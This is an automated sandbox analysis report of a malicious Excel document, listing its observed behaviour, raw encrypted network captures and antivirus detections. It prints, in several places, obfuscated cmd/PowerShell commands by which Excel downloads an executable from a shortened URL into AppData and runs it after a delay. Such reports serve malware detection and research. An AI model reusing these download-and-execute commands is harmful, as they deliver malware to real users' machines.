NtAllocateVirtualMemory April 6, 2021, 5:59 p.m.	process_identifier: 2932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\re.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
cmdline	powershell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 6, 2021, 5:59 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (27 events)

Data received	[
Data received	W`l"ð·7%9Qm9tJôrå;â&sDOWNGRD Â:KÿJ¶>h<LüÂô)6Âzr¹³³ö/KÀÿ
Data received	û
Data received	÷ ôR0N06 @IU2Òñÿ¶ÒÉ8Bª0 H÷ 0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20 200803000000Z 210803120000Z0m10 UUS10 UCA10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0"0 H÷ 0 ô"6¢\¼üBdYûQÞ`ÃxWf]_Âäá¼ÇYQìV0jG^AåùÂÈ±ºÞÈx^(ôÜPÏ\|ó¿´wö âBiûbUÅbBY(ë%k¡û ÕO_¬iú³ÛN4Ý)Ý÷á¥¢©úoÏ)](KÕ`QÀTñÑg}WL)m.»ÜÁÊt¼T[u®ÔcÝô)&ÅTj²®4²èä¥+áP«ÏÆ½ûÃx«2Líó}ÅpXðVdØeQ8#Óä%[jåûï$AhY1ÿ_¼e?Xí£00U#0©ü²EIÁo04+Ù°%Wz0Ucó{F¥KvÔØäCZ·0<U503sni.cloudflaressl.com .tinyurl.comtinyurl.com0Uÿ 0U%0++0{Ut0r07 5 31http://crl3.digicert.com/CloudflareIncRSACA-2.crl07 5 31http://crl4.digicert.com/CloudflareIncRSACA-2.crl0LU E0C07 `Hýl00(+https://www.digicert.com/CPS0g0v+j0h0$+0http://ocsp.digicert.com0@+04http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0Uÿ00 +Öyöóñwö\/Ñw0"T0VãM3¿ß/ ÌNñdãs±·5H0F!²Sç'À©ßÕ~KÊWc¡¸ÉhZðÁ !tIn!ÀfB ¢úý X\|@ÍÛn_ÉÖ÷bN-}ÓH5v\ÜCþæ«ED±^ÔVæ7ûÕúGÜ¡s²^æöÇÊs±·eG0E ]{qGl4°mÍTíAü4Ìì30¬DZÉtO!Ìø¼?ÍÁAU<4Ê;#\|¡ë.ÿ5Öî0Ï 0 H÷ yî7Þ µßÏ`^4(!Ë_M÷.púXz ELLâ@I;¨ºYÀj RtëÄ(g&V¦Xb4çGUmÇåÙàaªÑèZ»ñs>)2\|vZ:Øð0ÙJ¢ÈoXórBZÕôâ³¨]§Õ>>fÿcÖ¯Þ Ã9`çÂ~y4üEÏ#û+á=¿\÷f¹é¿L8$¡$ß¹¹ã&¢Í$?ú¥m³¹ª¿SY>jÏ"¯N}~]lmÝ¯²`&V#ôt¡çZ+tÖ¡ ª(ø $A`ësÿ&!00 Øsó³¸Ú[X8)0 H÷ 0Z10 UIE10U Baltimore10U CyberTrust1"0 UBaltimore CyberTrust Root0 200127124639Z 241231235959Z0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20"0 H÷ 0 µ]&È «±3]²Â1N~_Æo$íÚ®¾ç÷ÅÏTf8(èæi»ø1jVõèÁ¥èYè³à:a(°~Í ýÎ7Ãé©ÉxÊ¦`F¯t-OÚè RÈZ2Ï!!G\ªÀp±ñÞß-©ì[W99¾Âï×¶,J?ÑÖ³!¢O%,B#}×³Öi¯ÕªØhdãR/Ååô¯å ÙFçÏ2"ð7ÄýæâÌ:H×a¿=rÙp^ì i$â<HãþÓåQÔ+À¡Op¿·Òni-ÈÍ¢bLC7_:vZúni]ÅÁ£h0d0U©ü²EIÁo04+Ù°%Wz0U#0åY0GXÌ¬úT6{:µMð0Uÿ0U%0++0Uÿ0ÿ04+(0&0$+0http://ocsp.digicert.com0:U3010/ - +)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `Hýl00(+https://www.digicert.com/CPS0 `Hýl0g0g0g0 H÷ \|°¦dráaÝót=P§çÂN&+Açð°óòÒçPÒÆ©ºë¾ÁÁøO¼\|ær/é¶ÆviÝòjGkT¤ 5'ÝÈÓ´àÚ¦ðçÏæÒËÚ"wØI¨UÔÒÎÐèÚàBýÎ~Ê§Ã')¼ÿí.4ýFïNV\|èÜ"íS [º{àòO¥YAÍ³r.\ozJC+"ËÔ? \|óú\|ÛJsqéÕÝF¶qßõP~3Ò5u$^Z¨Eô´Ø¦±déûùeHöÃF~Z0S]4âòñðøã
Data received	K
Data received	GA`kbß?å²ÃÞa uÖ¹÷u1¦yo=4?Ý_YäÌö¥s¡Ä_BKÃÑõx"«>#ÝHûÌwå§÷©ª1Õep¯UÈ> È_8ö°fä£×¬ù¥DîèY¤a(9)Ö¼å3vOyD'kû8àßo"úHlnõ©ÒU¯')ÌÖ¼ÊK¨ÌSÊaÑ~zÌÑøÌhúyDÝEq1s6$caÔö aèêÃßùGSÿØåÈZÀî8¼ i7Çc\ÀãÑ<)r+±TWL³To@ÍI[Oª¥²K"± îÚÖ~òàQÜwDã&ËýÀÜ Y(éBäè¹¢îÐ{nb©¸{3xtp©/Ý¥M²ÚýZ gaýúÏÁÆ(
Data received
Data received
Data received
Data received
Data received	0
Data received	\|ÂÈÒíÉ²±R¼**â z=o¸´0 £>¿MêOËo´ù:Ì,qÂAÄÑé
Data received	p
Data received	+Ö×úæÆV½ì?´¬+#.Uª9/öäHúH¬A Ü¹ìÄ>9" ¾¤íxºÐ®6>òn;§û»KìËyaFÞÁ'oÿËkyNÀÂxc6?¼«X¼µC¸ày"£1\C¹dtÜÜim®ÛÓ MÜW¦ùX0¥³A]¿mTgöèmþ=8AÅÕ°«ë:\|[¾s/¼A ë£«ûÙæÂ?¸%Âx¢Oß?w¢àÎ´àª6rMßª¿_-¾ó'OóLÀI¼ÍaAðÝR7$gIRméAüôe þ[Z[xºìb¥^fË¨)þÓ0K³ùÐ¦¿jºé-É(JIIÅKÀ7aË¤rº)Bo$pØãà l½©o?éê\|ðgCDÉÆSÙô( ·tÃßê×!gòïñéHÑ¦sÑü¢PÒmz! è3ä6Ý^kØã»«ú2Ö×üE¾¹g²íÍ3ö-ö²ÆKíî=¡ß0¯Ne¿ó³×ïÙyµ¬" ¡ÞvëSþË,ÛND]?8M?2ëãZ]:^ìê"{çÚhövlæé[Û(H9p¶Ð5ýBÕ;³«R§tnãA#GoùÍ¦[À/Îàï>ë·T¶kÝA£×ò¢ûc´¦é¶¶ôZª 7«ìªàyÚ®Î? ÕÓó¯6±rò÷_¼ä·>ú¸¡k^èiCd¢úâºÉÊz8wOE·ÇÖIë¹é¢ØÕ{â´ ú¤¥õ×±cB·]ÿÚ7©(¹Tjÿrd®ZñJªi¯ÑÍÏR"Ø9¯÷B t¡)®¯°vLv@©l¥YuD1MË_Ý.³¯ÝIPì¿=yà µ/ya:Òãö Q%´,X!]5H.¸$Ä=-·4¾öùÒSr2uki÷ÍQFkØilyÀ®ij@ûrxë¢²?ÚdRuQ°ê%h/¨NËF§²Ô;nÆLLWùÈÇE#SÂërr6 ÛÉÎ:Gú]ÖcigrCê/6°j :åÈ%Yuw8lt{ËÎ·Ò9³ Í§¦lÇL?påsÌDI"AÇÎÎñ±5>`båúIî¶,ÓòÖräîuZÌu¼¨üGØMm]1}õ ¦¤Fu"Dß(E¦Q;¥Êy+nNêGÞí§õfàñåÒzÌFVÛt×ËÑÔ¼w=wþ«Õ·f ä%è]&ák²]"¹Ûâ yÈÚ3Mñ3¯>&<ÌUÑ["fº-¬²A¹âóÇCÁÑÀzÄxØÄPÜeu>÷fk#Mì½Þ1éÍ1¹ðëY&ß°¨æ¦^aõr.ãa¿åÉ-rñ¡´dy¸¹lÀÖ9:k03¨óÎÒ'<\çë^¢² ø$Ìüé+±vvEDLÀßØÅPGi·ÇdÍ òÊ;¶¹Ð® Ö82Êã$añOµ tÄBz\|øÎ`Û¯·üy÷G>÷¹ÓÀµ£HPtÛ Ô((p$`®Nüéåd°m&ª^P½òwiË¸¡Òq ÕJ+ÆÍ-<HOàý[ýçåôóÅ³N°ë2E¬¤òä¶ÊW¿Ù(HÈñt§)ü6ea(¿ ÛáEdSw®ÀN£MzËÏ3¢yèÙÑç¯;S9AHßÑ¾Äë
Data received	`
Data received	4ÿÖÚ_í «I54ò~âC?ÄÄÙÏÏEñÍÞhTeçWÕG a®LCäÞZrôí},Î³V}!ÆòÏåÝ Ù1ñ&+se®Ò zVi»ø}
Data received
Data received	ÕR<êìÖß=céýÒXJ%Sf§:fî¹±Z+¥²1
Data received	w©Ñkl¨Ñ_F].Á öxÂ`Eqß±¤¿ àÈÊËø 7:Çð¯)}È^©UÔÁ=4Ö»ÕênÂ!A4PÂXÏüNÍ7Õ~T+¨ÂgËñÅNRR%Lu:½JÓ_s +±¾dÿ5Ì;$Ì6ebÍ7Fò#®Pñ½X¿¦sÖºòb¶\|I4Ç¡§A7ûüuÑ1Ã®L¼OéfCo~Ï@C2<D4®Þëª¿g~¿5xNó ÍûH ·»NâÒÔFK5§HgÙV¤\ë÷µa¥võ$Ï0ÔWërÞø %\ IïÑ²®çÕt9ht@!· @tÅ"²>ø0Zrs"íT_eÌnüAc§»où(QÓ¤W§¼dgÅlÏµ-]W²Z}ûÇ¹Ár:¤gsSË"ÏZ)ßKnÁ}_döÿÆK/dufO¶]@È:nä^å¾\ë®°¥¿AWgÕÀ¡]Ø0:þ{DBmù/ù/)Ò¸§Ninyo ½¥`§ ó/¾õ5xÆÎ¥ò57v_ììÇ½rnÑzÆé$ïFHZ´ßK¹P¡¶JÜ,Rg«êÂUÀm¡.¥É(pIxMGáºä-¥ðÂÚ74{ËqQÞêu)Îü <[¸g],ÛJÄ¸pgVßZDbÇ3ÈCES3gÆÛãÍãúèàsB!0ÍÁÙäÊ³ENåÓªá±ºÓQNÇQ £ õËF·qÔ>´Ãw^åLüïnÄ5B¨qã§{õ\CxD¿öCtò_¬Vßý%7ÜÍC<¬rÌNâ8×ÛìOfÆ+Ô¬wÏ§=KÈÒæiÕç>[6Ïh¡îØÇ¥Ý¼bÉFWM6/ÃéxkZÖ^ xÖ:½m ºFÒ #în úÊ¡üç-ð£5swäJ ê7;Ï0Áª"¡×Æè3lKMÄþ¿ÛÌ´êSÞÜ]ýÒY%VPW¹Ãr®dø©23ïä`}PÓùmXÌq\\|Ýp ªSÈtI2èÍÇ!U=-2ÔuÙØX¡±êÁ ]êU`tç\|¹à? h Ê°ËMùoàFa,PëÈÛºsQ:¥u²ÿ£ÑmãrÛÝ«ñ¦ãy!á¤ªqÊî¨W¸t2O²î½9FqéµÐ^Wç¸¼þáïqäÊµ2§ÐÖòaÓ)óÒCâ¬rY:î®HµÔñÔ.N^³4rÎIèxNLÊæÀAØWÕÔaVEÏMê¬®^þGFB¿Áðtv\|w\|p°R½ðúW#¹×@.PÄÜ&".fR{Ü0MLÂáhn9áxÖ8mÀÅc¹¼y'ãSV¬Thqãg[9b%M¥Ø4Ä÷Ã=Á]]"®dûèµÀ1f°Æ½´¢f7N¥7DkRoÒ$î&<wiá´ËÌ:!¬¶:hõkÖÔôØ[i=NPìtZåÏÎ¯!óuG¸&pùBÿeg)Q¯ ÂÚ©ê(ÀbK6UêÓUê?yO¯éØKIAI¸eÆ.« w¬×Ð/*oOöb_ÀßùÈiñ Ë`Ô].© p´^òé»ë¢sÿÑ[ëN#y»¦ÝË
Data received	à
Data received	d28Æ²ZR½¾Ö:-Ë£Ýà!ojØ3¸«`EGÐÅ¸Bôyø2QQzíG.>-¥@[½,tó¦}è¯´£û<ë¬¬qe¦ñkÜÎDH«¥þÎ(PI"rYb¶<ð x52Ñ´ØÁ\XJV\ý¶_¬ íâôã«Ý>±ªü÷£û-¸YÊwL>>E2ûó~N5©Ü@ð )¹Ü%Õm5,ÑÙúÔËû®²Këm8mÃäØp£Üø=îöï!±÷Í""¸éa¨Ì4, û¦ïq%Sj-Ìêl1õ3Ö~wwö2ê{w·¬¯Ç²á(æ;ÊáLsLKÃwºN"Ãÿ!k/±þÒòÉk3ò¾?ÀzË¢/ñ;ºá/¼Óí2½[¥=kùæñW§ôìB»(àÍ>nKçðÈÃ£ÓÙØ6o8>ØCÁ}¨ñ&ùj}âw2CÉÖ.ð.»AzÓ¾%_áäô'V:ô©µrÎUiÂ&5ïÐà HÑy¿>ÉÙê¢½1¤+8!«Ðöv8ºê9ëZ[%¼²âÛ_Üy¥Ì¶~ÇøtÒ¨<Í:¶6QÄùH¿NÆ*im½ÝjÎ g#u]°=§ï`ò)[O3ràlñ§LæUÁwìÅEó5Ç×ÍkÊ°®ÐÓ_ø~íù¢ÇqLoQêâºÆÕéU]Óð@¾¬«í5¬±ikóIÏË Ùf¦LåO,®LQ, ±ãÙÑK}àñ_ËÀQ p^»AÛP÷Ö>Äç5Ý?¢û-¼ÞÆOf>ì_òRújóEGZðâÿÛ¹BD¨Me\|T¨Öù§þ
Data received	VÙål#)Û`ìÀïPú¸Ú>x6ªû¨næ q'é!#2þF)8$u_<íí²ñØüâæoÜ2Æ[C÷~r»Ô¸7¿uleïööÍ:¯2ÊðÉ @äWæ±KÕª>¼R²Zç19¦Ê§´oâê¿=jÆçïýµ[²÷OçwççaUu²F"FnõªÖ9ó¶¥\>ªk¡ªxRBòÿSl{·,ÖÇ.ë4yEØ¯ÿgMxìKX¨$NGUW]L»;ï]6IÂW"4"Fèpø ~A0#½A¯æËGX/CQ {4+ÈÈDÊß&Òm£´ÐÍPoë¤\yZé\a»©}(1tä£L¾¿Tt¥'8ÙAX8L&¬³óôÖåqWË¾~®ól(±°ÿÔÍNô"/F´&¬p"{" KjãÒç1ÐÊ/åÕgô óÚä½×4'·êc òÀLLÝ¤}uÎzÈµä,«cð7¥¢CÜWhO¬Ó\|ÉíÞ¤4Xø)b±×.7ªDÎÑb7ü'ëgØA{RÌï½UÆÊ¢8tXÛ9×Å\|SÝ¢óJ'\|ßV@2o(¿Li«ç8ü·ß¤«_êøñæòv½:H^ü¹§ðÈÊ$¯4ãÐÃ±ü'o'VÜ Öy½8õ¾SçÂ¸@ÛM-uyï"Qïð®H¬ëÈ^¿<¨wxª´ÊÍï¯:WÍ3r4hÚ Ù'âeïÈô9(Öû×zõE½È$;¶þ`9ú¤Æ»C »y7sùÚ ,Ksà¼Àó7¯63íÀsÏ;^ì²\QÆr´ñRÐBk?\$¾D½ð¦ÕÿWH6m¦'~YÎ?&Ö÷5Æy©ð(b×¿ÇÍ\|ª>ä¢©ØþÖ9h>D§¸Ö²í§çÅýu¸]Fó_Yox,2XJrÓO-'0XTwð¤^ëD1zs\ Ýî=¿ðK¬q¯ð7RQ¸D6S`.ÞKñ<1HY³õDÃÇ¿¶VsÍGo Öijä° ®úÆnGu®Ð ²~H_ý¶ôØâ ì`Âg!-¹Y»ß!#`85¬ ©9!@ZÃ»}üH¦ÈÞ(ÞCI8¸x°x³¯#¢òO]0Rèºê9 <4z,ÛqËk 6Ñ¡TÐ¡THÊhÉÿ¢ÚRy¼×ûNråqÅ2.~3DÌ¿ùuXß^Ç0¸é¹Ü#ÙÍF$!þ°ÞyPdº¸MlBëñ~\Fé?Wim¶û]J-+\|ËBnO"%r×=?(=$J w-%(UãèuóxSû/XH7²V[´·Ê1äK÷)ûÖþëøËæ£z-!Æ²©SlD¿ùA,É(h+ÄA ÆÅë¸-ëßJÆ½Ë'}bjm,aäóÛi,±;@Èúçt/ØgoA,½$R~¸HHzÓ«Á#e¡? Ô^\Æ¸ãGÈ$Â¯j±ÈÑ¤¹æÆÀ÷¯23ý¢ µI¸a½»ZQÓ }cgu0Xá^»ªIÅÆþ(÷ÄvÕGöîËÿmÇ¾\uËvlG?`«³uõÁ¦ö(064<É
Data received	CÛ'/o~ñË²²¾azE¾¾%±ãYé(ÊXÒ¨HßÌÐérè²ÖÐ÷{äýpï]Äº·sn)HK`Äð¾<iµU68þ{Scnön»÷¯ØbnR¶ylîj,Dc ¬bßèxréyxÚâpú®³;&¾6©¤f©@ØWÅÞÛ:p"9_p4ªgïôíîáâÛaF¿ìË'Ñ,T¦ìiKáê²ü.Z_/9ÀJGíq£be;]Kõ(íoÇZÅõàÀQYRïÇÎ¥ÎÑaàÛ¾V ö/Ta J<³iÀÑØ@óØ®ØG¯zÀå2ïú¨¾Z ,î%öT&¦bQ"²<ðMUÐCpûÎ_pÉTM$ÛS.#Ç,ÃVÔ´¤ÜVÎ¬\|÷!HRJ«ê¨ÊF Ëá<ëª¸?ìg+k:]àÉ@jÒu_UF$(R@éý Þ'N-8ì#RõÍùaúÅ8¶P$ùF°°VÐNÌÐz]Ë³t`Ú¥ëB!Üý°f\ªÒõbÉ®°]g}lF79¹?5;KûãK9×ª¡ã-Æ)YÃq_%{ªñÙñ °UV´¢-Ím½õÐjY¸´mêí/M6»f2{É¨þWÃzqQ3ª··¤W6,kO_¦#SJI:rK TxÐ eZLqÊ7!xb$Æ`GSÒ{Àñã?`ÈØÎùFYÌÉ¡%F1ÏVçù\|¯¾mOÂÉ åsÔ-"G¶ÊÔã7¶û¤@7,oÛí$øá¦8éÍôÏÚýÐÈç+M1âÇº.9]u7ª8ÔÚÕ,ãÌÑü§ôöÁºbõöÀ½3,LVô#o$:Ñ\é5rÊñJ4JøýôwÇ<ç¬ü"¿íq`{+,äO~Ý¡dý2ýe,nQyý}²¨ÒñstáPä0Í.ÇYdÒ?ò[ Ñro»}NìÍÅgsë¦Ù)©ÈZUÞ õPZôÁºÐ>¤~ÝVyg¥öùØ:K]4í¶Í¶A¨ËÛ¿&]VmZs7$XúÞÐÓxÇ°å!Sð«âù¼¯sªþ"ûÿ"MA>üPLV-áG=CqhÙh+µ>ßÙáJ½¶iÀöIã¢aí¡þÖ½pàª$MbÁÃTe±ôÞt%EA!·_Á¦/è4.øJlòÂy×!`'µØ¿ w«ð¤8g+qZÔÕHªSë`«¥³wÛçYyqºÏr$XhILÇ-N©k(ºÉÿm/Z§ûïÍËÍ+$/il7bë,RAðò>¥ø[ÇÿWFX_¤Ç¶W9&;ÁuêsÇ6ïÚ\aý~ìí[ð¼¼OJõ¸J7ÍEÌ¯ßþö4jQÆ°¢Çñ¨&uÜ LjpoYÁ%rñ°¸ÍS¸B¥Àà)ù§g4ÊÀÔw~×§> DMkèF@[ëQK°\ðÔÃ)¢:¬Ýá@o~Ø;Ä&¥Ø.k1ùAªf~#>RF"¶üùQå8ÉÑC(V®ýÉ&a9ÑpÄÞÿn©Ê ¬vÐ÷3ýPû©ÿ ü²ÙV{_s[$é"b¼,èÕ]ÁZË&õQWVèæùÎ
Data received	vÈ@ñ 1MG®»Ú4<õÕ¶°;þ¤ëôÞÒoo½·¸ð°¶¨'È¬~½9zZK:jÓz·¼¦ýd¹Ã?À¹py{Ýåù}ì2%Om ¿gíÏv)b[hó¯>ÍÖOdhbèjÿwè^Æ¿x<ªã<ngÔ«ÆgYà>æºÊ$Ýçm¢f÷÷.f;SÏg?wHÛäü²W©=¤Lñ]Xr[\³@º¼þß×]ëçfÿXµf=^áu#s}h1RêßZÌ~¤+N©¹Ùeò@}0¥#_3Be£ë§ÙO¤J;,X65ù/IIrR 9zìÞYëÕÃ<íÄõb´HÞö=÷NEÀ(g×£é'¾-ÈJOg¿_hf/å?@hlöFdù§B{À4f4c[Âk!¾$: ¾·v/±""ylÓÏ{¼cÒKÓjç¦imP¸î!°!ëmëØóuBlkÅ16R:ÿxÅ}ûêZ3· o¨¿4 ·J×LÔÛ+ÒO$ÃèÓ=\|Ý³Ö,2oÕ«ãNöÊf1ÓP±¹·HWë¡Þa¦3>và÷>ÅÃô^ã½!lïG~slÐ(Cèºñ÷~EZa¾¸ê«~&)Ð³æCÇÁs+m¡C$?S»æêÜ[uGjÄbÒ£4óvã`pÆ³Åqyçk<1ËÈûé¹9ö$B}IFRúbEW!ÒäIj:¶«¥P4G¿¡(Sï¿x"Á¡àî6ÑàÃÉÖ1wÝãÚÊ-1¶Ìb¼i)mÕ^÷Þ©¾{Éë5Û`ç[}`oËá$&cÝÈáHÞ×ÀQí½KJ1ù^`3S A BäÓãÙ'´%Ç·D§¥¤, Kª¿¶DÙÿ½¶Zâøî¼/Sç1<õòKûñ×²~µDò½Ùmâ«ÑZÁ8^¼Ðûçg+8¹knQòªägÂT{è¹©áäØénW?2f¾0=¾}êÇ>~hP;C·=ÛÄý¨mw _ âZOúXÍº;NE1«ððáØþb}LE¶^±ýµ{ÏïÈk¦Vl{ \|ÉZ¶g%Aøå\Þâ]Î>æfÀáOðÃ]ûÀªC2ë`ß(ß'ÐÄê:í¹¡äJLÜk¤%èÈ4ìÒl³ÛÜzC£}¤qN¥[S3§jq½7¥^ª>D¾kñ¢S\|5ÔÄ¬bënÖ Wå·Ò¢9hûç11Ç[ìøM0±q3¶@.\fd8QõË>r©·%oL«Rëî6oª_@=U5ýÌçI÷èP;Æ©rÚi\ím×Ûÿh>Ñr"kÕ§ªdÆïxxûXÇß_6yYj~ÃtÔ¦ì6Ç~Ám1}-ÿ¨±²R\|: ËüÉ¶rÚÖ°tp ÂQÔ&+sóqËá¹'ê-¥ r2 È»SÕhÅP+&òÔNO£ 02þG-@\vIÓÛ¿*éÒLkã`¢ý]Yöð<Î«yû×ÕùÒÄY¿Z^Ù¿,©ñ}»¦¹/ÕÀÇÒ×24»ý±9SÊ¡a{\ËUü-Õeþêä×éyÆøÖú×"ýØÍsä®H ÕÑ¿#cTÐÛ¢Þan¢ ¦hð /Å[
Data received	Ð
Data received	´Û¡o\|%Ê¯Âf]Ï¥;X]Gîj".ýØ^Vþ»ï²¿XHºç6ÉÖ}`¾oäËq½å©ÐI!L6V(ÞáÁøë½Þ¢ÒaekÝø.#Ó"ºí®«\Û½y7»ì[ß<3Üjª¢WtCð~~úQ Vù5?¯ÙZ6ÿù¿µK±É÷/ xÛô<Juq¼E©ë_ßúW£¥¥ý-ùM Èy~¡=?+ÆÒöe¸[µ>Ì$u³-8BÍÆvÕë¿Åïm³ÚøDAóøªñu£×ûlûvVºº§÷Ü)¨1÷¥ut¿´6IL9ç¥¦ý^Û¡\|´øÎZnÆÎ«OâA&ÿÁ;²êZü`±uÙ7SÅnªq¢ÝX ëi£å¶¸V;F´1,°JaØuø¹ÿ1"}ÈkÑ1Q\.¨WMZ»j:pBJvðy=ÂÊÌS5Ü;þ½¤;ü=ÂL[ÑCQiT\¡^ÙBÔ0bnºwcfxäýu:CÛy°ÎÞzÎ\|GÈ¢#Úb¼ÁúèIÉeè]ÈºÉKÊhÆä?ñ³ÚÒ?P±Mä0âÍ)»,·,IZ.ãÆÒôVÉ;ef#µ<Wó¿$,¯òæ2a#ý\ M3¼w[³È#hºÝÊo@ÎnP%D@FN²¤ 6Nk&ò§ÿªeÙ]<?ÖàÐàóÞý¹âw^k§÷f8S\|$Y¨ávC¹C¾Uc.ß ø.¤é:Æ5÷§aëÖ_RÆe;ÁCè±~mù0nÙU}QÞ.ÕuÜ ¢Ç'½(Ð=<¢Oæù&d"Êíöãùó¸ß j}èÍ @¯¨ê×y$âJdß1bkàj0:l\|@ã ·lp7=îªã£êð$ ³ªÇ¤8IÆ±»äÔ^KZÅ§4ÅoUÖM)è§ÿ xÃA$R/Ò.ß7HÈé6HÌÜ=ýl^Üé¨dLëi;99Û»ØlìizxÝsï"C÷ßÏ8 LÍh}bo5+rêhü$0Ãl/ÕÊü"£6öº4"µà °µ«)V¯phàä¨8Ö(Ì¾i ÄÈéë4yH!Ü÷ÑhV©S¬5Ð]W^©Ô¹
Data received	æ÷É5PRîþáÔ;X`+`3¯1[}o®°

Poweshell is sending data to a remote host (4 events)

Data sent	nj`l"ã9U_Òù4¢/èr¶Ó¯øþ/5 ÀÀÀ À 28)ÿtinyurl.com
Data sent	FBA(8>[;_ j§g#?WUTàí?*Âj«peÏ×ïÆB<)fcy #ÝØyèÛbÒ>iÛÝë-ý0Ã¹Þ¡yFçY½nQò<ü\W?m¥ ïLÓ2åÛA¿ßX&
Data sent	`Ål u<+¦øsÈ îAÄ&BË3'çíù°(h¥?aN£ïÕ.âÕ_@ÏQâÏê¸ôâäøú5ß¥q¬\|5ð X2k".Lë±ý/báÆÿÿ;
Data sent	p±µàXòï;E´(1ÃÁ,_»åýQ³:¼ËF±d'î-°`ÚI îÕ¤^Ãy45déÐ(Û¹Z£@\ÚÓÝ¡nXÖýTàY*»#ñª¥ÆãÝÊRÆ¹²§VÌÃíÉ

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 6, 2021, 5:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 6, 2021, 5:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\re.exe

A command shell or script process was created by an unexpected parent process (2 events)

parent_process	excel.exe				martian_process	cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process	excel.exe				martian_process	cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send April 6, 2021, 5:59 p.m.	buffer: nj`l"ã9U_Òù4¢/èr¶Ó¯øþ/5 ÀÀÀ À 28)ÿtinyurl.com socket: 1428 sent: 115	1	115
send April 6, 2021, 5:59 p.m.	buffer: FBA(8>[;_ j§g#?WUTàí?*Âj«peÏ×ïÆB<)fcy #ÝØyèÛbÒ>iÛÝë-ý0Ã¹Þ¡yFçY½nQò<ü\W?m¥ ïLÓ2åÛA¿ßX& socket: 1428 sent: 134	1	134
send April 6, 2021, 5:59 p.m.	buffer: `Ål u<+¦øsÈ îAÄ&BË3'çíù°(h¥?aN£ïÕ.âÕ_@ÏQâÏê¸ôâäøú5ß¥q¬\|5ð X2k".Lë±ý/báÆÿÿ; socket: 1428 sent: 101	1	101
send April 6, 2021, 5:59 p.m.	buffer: p±µàXòï;E´(1ÃÁ,_»åýQ³:¼ËF±d'î-°`ÚI îÕ¤^Ãy45déÐ(Û¹Z£@\ÚÓÝ¡nXÖýTàY*»#ñª¥ÆãÝÊRÆ¹²§VÌÃíÉ socket: 1428 sent: 117	1	117

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\re.exe
parent_process	excel.exe	martian_process	cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process	excel.exe	martian_process	cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))

Creates a suspicious Powershell process (1 event)

value

Uses powershell to execute a file download from the command line

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

CAT-QuickHeal	Ole.Trojan.A942401
McAfee	W97M/Downloader.czq
Cyren	Trojan.OLXK-6
Symantec	W97M.Downloader
TrendMicro-HouseCall	TROJ_FRS.VSNTIS20
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
ViRobot	XLS.Z.Agent.57856.BS
Tencent	Win32.Trojan-downloader.Agent.Auto
F-Secure	Malware.W2000M/Agent.AZ
DrWeb	Exploit.Siggen2.44999
TrendMicro	TROJ_FRS.VSNTIS20
McAfee-GW-Edition	W97M/Downloader.czq
Avira	W2000M/Agent.AZ
Microsoft	TrojanDownloader:O97M/Obfuse.JQ!MTB
AegisLab	Trojan.Script.Generic.4!c
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	Generic.Trojan.Agent.AEJUPV
Cynet	Malicious (score: 85)
Zoner	Probably Heur.W97ShellB
ESET-NOD32	a variant of Generik.KHBWLI
Ikarus	Trojan-Downloader.VBA.Agent
Fortinet	MSExcel/Agent.AXZBT!tr
AVG	Other:Malware-gen [Trj]
Qihoo-360	Generic/Trojan.Script.ed4

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Roaming\re.exe

